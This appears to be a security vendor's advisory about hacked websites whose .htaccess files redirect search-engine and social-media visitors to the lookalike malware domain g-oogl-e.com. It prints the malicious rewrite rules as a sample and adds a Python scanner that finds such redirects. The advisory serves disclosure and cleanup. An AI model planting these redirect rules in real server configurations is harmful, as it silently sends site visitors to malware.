• Malware Faking Google (g-oogl-e.com)

    Malicious hackers are compromising websites in droves. Over 6,600 websites are hacked every day and begin distributing malware to potential customers and visitors, destroying their owners’ online reputation.

    In the vast majority of cases, affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article, we will discuss a new strain of malware that has already infected thousands of legitimate websites (at least 1,163, at last count, are affected by g-oogl-e.com).

    What does this attack do?
    This particular attack infects the .htaccess file on web servers and redirects visitors to sites serving malware.

    One particular website used to spread the malware is g-oogl-e.com, which plays on the google.com domain name in order to trick unsuspecting visitors into trusting the site. See below for a list of the malware host sites and their associated internet addresses (IPs).

    Malware hosts:


    Take Action
    Administrators and website owners need to protect the reputation of their websites. As a first step, you must remove the malicious configuration from your “.htaccess” and “index.php” files on your hosting account.

    If you choose not to take action, visitors to your website and potential customers may be infected with malware, your website will be blacklisted by search engines like Google, Bing, and Yahoo, and your reputation and revenue will take a nosedive.

    A compromised “.htaccess” file will have entries that look like the ones below:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .live. [OR]
    RewriteCond %{HTTP_REFERER} .twitter. [OR]
    RewriteCond %{HTTP_REFERER} .linkedin. [OR]
    RewriteCond %{HTTP_REFERER} .myspace. [OR]
    RewriteRule .* http://g-oogl-e.com [R,L]

    The malicious redirects found in “.htaccess” files on compromised website accounts must be deleted.
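
    To find such entries across a hosting account, the following added example (not part of the original article) flags any RewriteRule that is guarded by HTTP_REFERER conditions and points to a host other than your own. The function names, the sample text and the www.example.org host are assumptions made for illustration.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample: entries like those shown above plus one benign HTTPS rule.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteRule .* http://g-oogl-e.com [R,L]
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target_host, referer_patterns) for every RewriteRule
    that sends referred visitors to a host not listed in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, patterns = [], []
    for line_no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            # Collect only conditions that test the Referer header.
            if "HTTP_REFERER" in cond.group(1).upper():
                patterns.append(cond.group(2))
            continue
        rule = RULE.match(line)
        if rule:
            # mod_rewrite redirects externally when the target is an
            # absolute URL on another host, so the host is what we check.
            host = (urlparse(rule.group(2)).hostname or "").lower()
            if patterns and host and host not in own:
                findings.append((line_no, host, patterns))
            patterns = []  # conditions apply only to the next RewriteRule
    return findings

def scan_tree(root, own_hosts=()):
    """Check every .htaccess file under root; returns {path: findings}."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(folder, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_referer_redirects(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits
```

    Run scan_tree over the document root with your own hostnames in own_hosts; each finding gives the line number of the rule to review and the host it redirects to.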

    We Can Help!
    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.